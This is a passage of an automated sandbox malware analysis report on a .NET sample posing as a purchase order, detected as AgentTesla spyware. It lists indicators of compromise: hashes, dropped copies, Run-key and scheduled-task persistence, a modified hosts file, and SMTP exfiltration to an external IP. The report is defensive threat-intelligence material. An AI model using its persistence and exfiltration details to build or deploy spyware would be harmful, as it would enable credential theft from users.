http://www.sakkal.com	PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.ipify.org%	kprUEGC.exe, 00000013.00000002.624776782.0000000003021000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	PO #047428.exe, 00000000.00000002.256271000.0000000003DF5000.00000004.00000001.sdmp, PO #047428.exe, 00000004.00000002.619632627.0000000000402000.00000040.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.338811978.0000000004807000.00000004.00000001.sdmp, kprUEGC.exe, 00000013.00000002.619723039.0000000000402000.00000040.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.156.59.2	unknown	United States		29802	HVC-ASUS	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	344916
Start date:	27.01.2021
Start time:	13:10:51
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	PO #047428.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	35
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.adwa.spyw.evad.winEXE@15/9@2/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 0.2% (good quality ratio 0.2%) Quality average: 54.2% Quality standard deviation: 39.8%
HCA Information:	Successful, ratio: 96% Number of executed functions: 100 Number of non-executed functions: 2
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 40.88.32.150, 52.147.198.201, 23.210.248.85, 51.11.168.160, 20.54.26.129, 51.103.5.159, 93.184.221.240, 95.101.22.224, 95.101.22.216, 51.104.139.180, 52.155.217.156 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, vip1-par02p.wns.notify.trafficmanager.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, wu.ec.azureedge.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, par02p.wns.notify.trafficmanager.net Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:11:48	API Interceptor	1044x Sleep call for process: PO #047428.exe modified
13:12:13	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run kprUEGC C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
13:12:21	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run kprUEGC C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
13:12:24	API Interceptor	864x Sleep call for process: kprUEGC.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
104.156.59.2	BANK SLIP.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
mail.sharqcapital.qa	BANK SLIP.exe	Get hash	malicious	Browse	104.156.59.2

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HVC-ASUS	P.O EME39134.xlsx	Get hash	malicious	Browse	23.227.207.253
	Mensaje-22-012021.doc	Get hash	malicious	Browse	23.227.169.146
	57229937-122020-4-7676523.doc	Get hash	malicious	Browse	23.111.174.153
	Qt_1186.xls	Get hash	malicious	Browse	96.31.77.143
	Qt_1186.xls	Get hash	malicious	Browse	96.31.77.143
	dGWioTejLEz0eVM.exe	Get hash	malicious	Browse	162.252.80.144
	9tyZf93qRdNHfVw.exe	Get hash	malicious	Browse	162.252.80.144
	BANK SLIP.exe	Get hash	malicious	Browse	104.156.59.2
	5YfNeXk1f0wrxXm.exe	Get hash	malicious	Browse	37.1.210.155
	15012021.exe	Get hash	malicious	Browse	23.111.136.146
	urgent specification request.exe	Get hash	malicious	Browse	23.111.136.146
	P396143.htm	Get hash	malicious	Browse	23.111.188.5
	SCAN_20210112_132640143,pdf.exe	Get hash	malicious	Browse	199.193.115.48
	P166824.htm	Get hash	malicious	Browse	23.111.188.5
	Archivo_122020_1977149.doc	Get hash	malicious	Browse	23.111.174.153
	H56P7iDwnJ.doc	Get hash	malicious	Browse	162.254.150.6
	0939489392303224233.exe	Get hash	malicious	Browse	194.126.175.2
	RFQ-B201902-0064.exe	Get hash	malicious	Browse	103.28.70.234
	ar208.exe	Get hash	malicious	Browse	37.1.210.208
	ar208.exe	Get hash	malicious	Browse	37.1.210.208

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO #047428.exe.log Download File
Process:	C:\Users\user\Desktop\PO #047428.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5:	FED34146BF2F2FA59DCF8702FCC8232E
SHA1:	B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256:	123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512:	1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\kprUEGC.exe.log Download File
Process:	C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5:	FED34146BF2F2FA59DCF8702FCC8232E
SHA1:	B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256:	123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512:	1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Temp\tmp3604.tmp Download File
Process:	C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1645
Entropy (8bit):	5.175204428683808
Encrypted:	false
SSDEEP:	24:2dH4+SEqC/a7hTlNMFpH/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBytn:cbhC7ZlNQF/rydbz9I3YODOLNdq36
MD5:	33629F4EC3F23446CB0EE85619FD0375
SHA1:	7D50E25F2D8179F3371B877D05DA5382720F7AE5
SHA-256:	84297148F016B340559FF8E0F0BC264490DAD8DE8BFD8939DE85A67C3372BA8F
SHA-512:	E08575E17A26843416EF83EC3FBBAA32BFBF59F33A0F2D9D74715B48FC6C3AE6BB499771ADA057A8A8A7E5ED56A5A37BBD05946698B1B92ACA9D5A81134C85D9
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>t

C:\Users\user\AppData\Local\Temp\tmpA80C.tmp Download File
Process:	C:\Users\user\Desktop\PO #047428.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1645
Entropy (8bit):	5.175204428683808
Encrypted:	false
SSDEEP:	24:2dH4+SEqC/a7hTlNMFpH/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBytn:cbhC7ZlNQF/rydbz9I3YODOLNdq36
MD5:	33629F4EC3F23446CB0EE85619FD0375
SHA1:	7D50E25F2D8179F3371B877D05DA5382720F7AE5
SHA-256:	84297148F016B340559FF8E0F0BC264490DAD8DE8BFD8939DE85A67C3372BA8F
SHA-512:	E08575E17A26843416EF83EC3FBBAA32BFBF59F33A0F2D9D74715B48FC6C3AE6BB499771ADA057A8A8A7E5ED56A5A37BBD05946698B1B92ACA9D5A81134C85D9
Malicious:	true
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>t

C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe Download File
Process:	C:\Users\user\Desktop\PO #047428.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	700416
Entropy (8bit):	7.9457610727759
Encrypted:	false
SSDEEP:	12288:YxLYHwda8+o7QwKbwQos8SIusfv52PpseioN+W3xIx98Nu//r4YSVtL:YxL48+0puVR8Tp2RU6lB4h/r4/VZ
MD5:	747CE85EEF93567C5676649AEF9C00B8
SHA1:	99CB598151F63F464ED92C3E42749721CBC9091B
SHA-256:	BC445FD5E14BE52B529F507908767C8CF463D49B0B3353923BC308E64DA81BDA
SHA-512:	D338A922AE19CCAB49C2A80AB558B8573F24A4CA57AA7C1A3DCD1C0F9F7B44796D45AC50A4954463525E3E54F22858217DD71D0370BC78A88F4051DCFECEAC1F
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 30%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............0.................. ........@.. ....................... ............@.................................d...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H...........N..........................................................".(.........0...........r...p(.....(.....r+..p(.....(.....rS..p.rq..p(....(.....(....(......s8....r}..p..o>...oF...o....(....(.....r...p..o>.....1...%..r...p..(....(.....o?.......(....(....(.....r...p(......0..@........r...p(.....(......s8....r...p.oF...o....(....(.....r...p(......0...............Yo.....+...0...............o........+..*...0..e..........( .......,O...i.....,C...i.+1....Y.o!..........,.

C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\PO #047428.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\yXAQfeQN.exe Download File
Process:	C:\Users\user\Desktop\PO #047428.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	700416
Entropy (8bit):	7.9457610727759
Encrypted:	false
SSDEEP:	12288:YxLYHwda8+o7QwKbwQos8SIusfv52PpseioN+W3xIx98Nu//r4YSVtL:YxL48+0puVR8Tp2RU6lB4h/r4/VZ
MD5:	747CE85EEF93567C5676649AEF9C00B8
SHA1:	99CB598151F63F464ED92C3E42749721CBC9091B
SHA-256:	BC445FD5E14BE52B529F507908767C8CF463D49B0B3353923BC308E64DA81BDA
SHA-512:	D338A922AE19CCAB49C2A80AB558B8573F24A4CA57AA7C1A3DCD1C0F9F7B44796D45AC50A4954463525E3E54F22858217DD71D0370BC78A88F4051DCFECEAC1F
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 30%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............0.................. ........@.. ....................... ............@.................................d...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H...........N..........................................................".(.........0...........r...p(.....(.....r+..p(.....(.....rS..p.rq..p(....(.....(....(......s8....r}..p..o>...oF...o....(....(.....r...p..o>.....1...%..r...p..(....(.....o?.......(....(....(.....r...p(......0..@........r...p(.....(......s8....r...p.oF...o....(....(.....r...p(......0...............Yo.....+...0...............o........+..*...0..e..........( .......,O...i.....,C...i.+1....Y.o!..........,.

C:\Windows\System32\drivers\etc\hosts Download File
Process:	C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	11
Entropy (8bit):	2.663532754804255
Encrypted:	false
SSDEEP:	3:iLE:iLE
MD5:	B24D295C1F84ECBFB566103374FB91C5
SHA1:	6A750D3F8B45C240637332071D34B403FA1FF55A
SHA-256:	4DC7B65075FBC5B5421551F0CB814CAFDC8CACA5957D393C222EE388B6F405F4
SHA-512:	9BE279BFA70A859608B50EF5D30BF2345F334E5F433C410EA6A188DCAB395BFF50C95B165177E59A29261464871C11F903A9ECE55B2D900FE49A9F3C49EB88FA
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	..127.0.0.1

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.9457610727759
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	PO #047428.exe
File size:	700416
MD5:	747ce85eef93567c5676649aef9c00b8
SHA1:	99cb598151f63f464ed92c3e42749721cbc9091b
SHA256:	bc445fd5e14be52b529f507908767c8cf463d49b0b3353923bc308e64da81bda
SHA512:	d338a922ae19ccab49c2a80ab558b8573f24a4ca57aa7c1a3dcd1c0f9f7b44796d45ac50a4954463525e3e54f22858217dd71d0370bc78a88f4051dcfeceac1f
SSDEEP:	12288:YxLYHwda8+o7QwKbwQos8SIusfv52PpseioN+W3xIx98Nu//r4YSVtL:YxL48+0puVR8Tp2RU6lB4h/r4/VZ
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............0.................. ........@.. ....................... ............@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x4ac5b6
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x601081FC [Tue Jan 26 20:56:28 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xac564	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xae000	0x58c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb0000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xaa5bc	0xaa600	False	0.95267361748	data	7.95157187123	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0xae000	0x58c	0x600	False	0.415364583333	data	4.04065385568	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xb0000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0xae090	0x2fc	data
RT_MANIFEST	0xae39c	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2018
Assembly Version	1.0.0.0
InternalName	q.exe
FileVersion	1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName	MathLib
ProductVersion	1.0.0.0
FileDescription	MathLib
OriginalFilename	q.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/27/21-13:13:33.499156	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49732	587	192.168.2.5	104.156.59.2
01/27/21-13:14:27.504328	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49745	587	192.168.2.5	104.156.59.2

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 27, 2021 13:13:31.745484114 CET	49732	587	192.168.2.5	104.156.59.2
Jan 27, 2021 13:13:31.921103001 CET	587	49732	104.156.59.2	192.168.2.5
Jan 27, 2021 13:13:31.921437025 CET	49732	587	192.168.2.5	104.156.59.2
Jan 27, 2021 13:13:32.425972939 CET	587	49732	104.156.59.2	192.168.2.5
Jan 27, 2021 13:13:32.426815987 CET	49732	587	192.168.2.5	104.156.59.2
Jan 27, 2021 13:13:32.602416992 CET	587	49732	104.156.59.2	192.168.2.5
Jan 27, 2021 13:13:32.604295969 CET	49732	587	192.168.2.5	104.156.59.2
Jan 27, 2021 13:13:32.779844046 CET	587	49732	104.156.59.2	192.168.2.5
Jan 27, 2021 13:13:32.780386925 CET	49732	587	192.168.2.5	104.156.59.2
Jan 27, 2021 13:13:32.964396000 CET	587	49732	104.156.59.2	192.168.2.5
Jan 27, 2021 13:13:32.965574980 CET	49732	587	192.168.2.5	104.156.59.2
Jan 27, 2021 13:13:33.141422033 CET	587	49732	104.156.59.2	192.168.2.5
Jan 27, 2021 13:13:33.142064095 CET	49732	587	192.168.2.5	104.156.59.2
Jan 27, 2021 13:13:33.318150043 CET	587	49732	104.156.59.2	192.168.2.5
Jan 27, 2021 13:13:33.318813086 CET	49732	587	192.168.2.5	104.156.59.2
Jan 27, 2021 13:13:33.496608019 CET	587	49732	104.156.59.2	192.168.2.5
Jan 27, 2021 13:13:33.496655941 CET	587	49732	104.156.59.2	192.168.2.5
Jan 27, 2021 13:13:33.499155998 CET	49732	587	192.168.2.5	104.156.59.2
Jan 27, 2021 13:13:33.499299049 CET	49732	587	192.168.2.5	104.156.59.2
Jan 27, 2021 13:13:33.499764919 CET	49732	587	192.168.2.5	104.156.59.2
Jan 27, 2021 13:13:33.499865055 CET	49732	587	192.168.2.5	104.156.59.2
Jan 27, 2021 13:13:33.676569939 CET	587	49732	104.156.59.2	192.168.2.5
Jan 27, 2021 13:13:33.676847935 CET	587	49732	104.156.59.2	192.168.2.5
Jan 27, 2021 13:13:33.679169893 CET	587	49732	104.156.59.2	192.168.2.5
Jan 27, 2021 13:13:33.720056057 CET	49732	587	192.168.2.5	104.156.59.2
Jan 27, 2021 13:14:26.075268030 CET	49745	587	192.168.2.5	104.156.59.2
Jan 27, 2021 13:14:26.252779961 CET	587	49745	104.156.59.2	192.168.2.5
Jan 27, 2021 13:14:26.252954006 CET	49745	587	192.168.2.5	104.156.59.2
Jan 27, 2021 13:14:26.438112020 CET	587	49745	104.156.59.2	192.168.2.5
Jan 27, 2021 13:14:26.439798117 CET	49745	587	192.168.2.5	104.156.59.2
Jan 27, 2021 13:14:26.615257978 CET	587	49745	104.156.59.2	192.168.2.5
Jan 27, 2021 13:14:26.615653038 CET	49745	587	192.168.2.5	104.156.59.2
Jan 27, 2021 13:14:26.791306973 CET	587	49745	104.156.59.2	192.168.2.5
Jan 27, 2021 13:14:26.792066097 CET	49745	587	192.168.2.5	104.156.59.2
Jan 27, 2021 13:14:26.972917080 CET	587	49745	104.156.59.2	192.168.2.5
